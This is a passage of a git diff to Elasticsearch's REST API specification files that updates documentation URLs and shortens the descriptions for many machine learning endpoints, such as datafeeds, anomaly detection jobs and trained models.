--git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json index 8eb6624213bd9..8790a792ad86d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_datafeeds.json @@ -1,8 +1,8 @@ { "ml.get_datafeeds":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html", - "description":"Retrieves configuration information for datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-datafeeds", + "description":"Get datafeeds configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json index 1f195a4260c44..aeaf0a0135e30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_filters.json @@ -1,8 +1,8 @@ { "ml.get_filters":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-filter.html", - "description":"Retrieves filters." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters", + "description":"Get filters" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json index bf4e43d4b0302..88d901b7f9edd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_influencers.json @@ -1,8 +1,8 @@ { "ml.get_influencers":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html", - "description":"Retrieves anomaly detection job results for one or more influencers." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-influencers", + "description":"Get anomaly detection job results for influencers" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json index d19b858d8fd51..e270ea207b032 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_job_stats.json @@ -1,8 +1,8 @@ { "ml.get_job_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html", - "description":"Retrieves usage information for anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats", + "description":"Get anomaly detection job stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json index 3de361872d180..97267ec66c6ab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_jobs.json @@ -1,8 +1,8 @@ { "ml.get_jobs":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html", - "description":"Retrieves configuration information for anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs", + "description":"Get anomaly detection jobs configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json index 272f2264292d3..341aa4fe5bf4b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_memory_stats.json @@ -1,8 +1,8 @@ { "ml.get_memory_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-ml-memory.html", - "description":"Returns information on how ML is using memory." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-memory-stats", + "description":"Get machine learning memory usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json index f20b770501133..fe054c827b857 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshot_upgrade_stats.json @@ -1,8 +1,8 @@ { "ml.get_model_snapshot_upgrade_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-model-snapshot-upgrade-stats.html", - "description":"Gets stats for anomaly detection job model snapshot upgrades that are in progress." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshot-upgrade-stats", + "description":"Get anomaly detection job model snapshot upgrade usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json index 1a9c91478b325..d03aa02949d58 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_model_snapshots.json @@ -1,8 +1,8 @@ { "ml.get_model_snapshots":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html", - "description":"Retrieves information about model snapshots." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshots", + "description":"Get model snapshots info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json index a8e97ac87b1ef..1bf5bccc199e2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_overall_buckets.json @@ -1,8 +1,8 @@ { "ml.get_overall_buckets":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-overall-buckets.html", - "description":"Retrieves overall bucket results that summarize the bucket results of multiple anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-overall-buckets", + "description":"Get overall bucket results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json index 9af20f7019929..25cc0984c3ca6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_records.json @@ -1,8 +1,8 @@ { "ml.get_records":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html", - "description":"Retrieves anomaly records for an anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-records", + "description":"Get anomaly records for an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json index e5b635b02075c..69960e00e2110 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models.json @@ -1,8 +1,8 @@ { "ml.get_trained_models":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-trained-models.html", - "description":"Retrieves configuration information for a trained inference model." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models", + "description":"Get trained model configuration info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json index c04b265b36c83..ad1a8fecdc3f7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.get_trained_models_stats.json @@ -1,8 +1,8 @@ { "ml.get_trained_models_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-trained-models-stats.html", - "description":"Retrieves usage information for trained inference models." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-trained-models-stats", + "description":"Get trained models usage info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json index 95d389266302c..a3dba67c2425f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.infer_trained_model.json @@ -1,8 +1,8 @@ { "ml.infer_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/infer-trained-model.html", - "description":"Evaluate a trained model." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-infer-trained-model", + "description":"Evaluate a trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json index 25659abf3f662..8ed321939c20a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.info.json @@ -1,8 +1,8 @@ { "ml.info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-ml-info.html", - "description":"Returns defaults and limits used by machine learning." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info", + "description":"Get machine learning information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json index b93b9cff82568..a4ecabe13ec9b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.open_job.json @@ -1,8 +1,8 @@ { "ml.open_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html", - "description":"Opens one or more anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-open-job", + "description":"Open anomaly detection jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json index a23472b752a38..1b01dd16f7f5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_calendar_events.json @@ -1,8 +1,8 @@ { "ml.post_calendar_events":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-calendar-event.html", - "description":"Posts scheduled events in a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-post-calendar-events", + "description":"Add scheduled events to the calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json index cd2deb1024c1e..f2567ea1ad69a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.post_data.json @@ -1,8 +1,8 @@ { "ml.post_data":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html", - "description":"Sends data to an anomaly detection job for analysis." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-post-data", + "description":"Send data to an anomaly detection job for analysis" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json index 363318c319b54..242b7b4241635 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.preview_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/preview-dfanalytics.html", - "description":"Previews that will be analyzed given a data frame analytics config." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-preview-data-frame-analytics", + "description":"Preview features used by data frame analytics" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json index 7af47194aa4a7..0a3b618bf7065 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.preview_datafeed.json @@ -1,8 +1,8 @@ { "ml.preview_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html", - "description":"Previews a datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-preview-datafeed", + "description":"Preview a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json index 597b5d958193d..91b6cf27d2638 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar.json @@ -1,8 +1,8 @@ { "ml.put_calendar":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-calendar.html", - "description":"Instantiates a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar", + "description":"Create a calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json index e7e0476a790da..d197a80ba1357 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_calendar_job.json @@ -1,8 +1,8 @@ { "ml.put_calendar_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-calendar-job.html", - "description":"Adds an anomaly detection job to a calendar." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-calendar-job", + "description":"Add anomaly detection job to calendar" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json index 747f018428aa4..688a958c5a254 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.put_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-dfanalytics.html", - "description":"Instantiates a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-data-frame-analytics", + "description":"Create a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json index 147290cfaf520..af2abad602e6f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_datafeed.json @@ -1,8 +1,8 @@ { "ml.put_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html", - "description":"Instantiates a datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-datafeed", + "description":"Create a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json index 0e7de69a9fed1..4e89bc8a62f77 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_filter.json @@ -1,8 +1,8 @@ { "ml.put_filter":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-filter.html", - "description":"Instantiates a filter." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-filter", + "description":"Create a filter" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json index 52cb95fc56b5b..dc955cc48141c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_job.json @@ -1,8 +1,8 @@ { "ml.put_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html", - "description":"Instantiates an anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-job", + "description":"Create an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json index 33e6aee74e8fa..c633693599a33 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model.json @@ -1,8 +1,8 @@ { "ml.put_trained_model":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-models.html", - "description":"Creates an inference trained model." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model", + "description":"Create a trained model" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json index 3f953d1b9d693..27719f0bea339 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_alias.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-models-aliases.html", - "description":"Creates a new model alias (or reassigns an existing one) to refer to the trained model" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-alias", + "description":"Create or update a trained model alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json index bf826f36e93c6..fb484915c92f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_definition_part.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_definition_part":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-model-definition-part.html", - "description":"Creates part of a trained model definition" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-definition-part", + "description":"Create part of a trained model definition" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json index f6fd70a75c000..b35c95b36f39a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.put_trained_model_vocabulary.json @@ -1,8 +1,8 @@ { "ml.put_trained_model_vocabulary":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/put-trained-model-vocabulary.html", - "description":"Creates a trained model vocabulary" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-trained-model-vocabulary", + "description":"Create a trained model vocabulary" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json index bcfb48871371b..ef32819cb5386 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.reset_job.json @@ -1,8 +1,8 @@ { "ml.reset_job":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-reset-job.html", - "description":"Resets an existing anomaly detection job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-reset-job", + "description":"Reset an anomaly detection job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json index 02ae0edd610e6..8859e57ee1e39 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.revert_model_snapshot.json @@ -1,8 +1,8 @@ { "ml.revert_model_snapshot":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html", - "description":"Reverts to a specific snapshot." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-revert-model-snapshot", + "description":"Revert to a snapshot" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json index 0ef2ad9a4b650..912c6f04c1e3e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.set_upgrade_mode.json @@ -1,8 +1,8 @@ { "ml.set_upgrade_mode":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-set-upgrade-mode.html", - "description":"Sets a cluster wide upgrade_mode setting that prepares machine learning indices for an upgrade." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-set-upgrade-mode", + "description":"Set upgrade_mode for ML indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json index 039bc24a141ed..078d65cd60d3c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.start_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/start-dfanalytics.html", - "description":"Starts a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-data-frame-analytics", + "description":"Start a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json index 9e9231805ea91..804c4ba22990f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_datafeed.json @@ -1,8 +1,8 @@ { "ml.start_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html", - "description":"Starts one or more datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-datafeed", + "description":"Start datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json index 3abf072e2efe5..5fd3c0f69fe14 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.start_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.start_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/start-trained-model-deployment.html", - "description":"Start a trained model deployment." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-start-trained-model-deployment", + "description":"Start a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json index 3fc6c3046524f..4e7e0a4f4d675 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.stop_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/stop-dfanalytics.html", - "description":"Stops one or more data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-data-frame-analytics", + "description":"Stop data frame analytics jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json index 6eb64661f6f41..998b7edcb135a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_datafeed.json @@ -1,8 +1,8 @@ { "ml.stop_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html", - "description":"Stops one or more datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-datafeed", + "description":"Stop datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json index 016d88c684e43..46f64bdb446d9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.stop_trained_model_deployment.json @@ -1,8 +1,8 @@ { "ml.stop_trained_model_deployment":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/stop-trained-model-deployment.html", - "description":"Stop a trained model deployment." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-stop-trained-model-deployment", + "description":"Stop a trained model deployment" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json index a7ea3bb22e513..c35c242fe1a54 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_data_frame_analytics.json @@ -1,8 +1,8 @@ { "ml.update_data_frame_analytics":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-dfanalytics.html", - "description":"Updates certain properties of a data frame analytics job." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-data-frame-analytics", + "description":"Update a data frame analytics job" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json index 8c353a550d9c7..c618997252941 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_datafeed.json @@ -1,8 +1,8 @@ { "ml.update_datafeed":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html", - "description":"Updates certain properties of a datafeed." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-update-datafeed", + "description":"Update a datafeed" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ml.update_filter.json 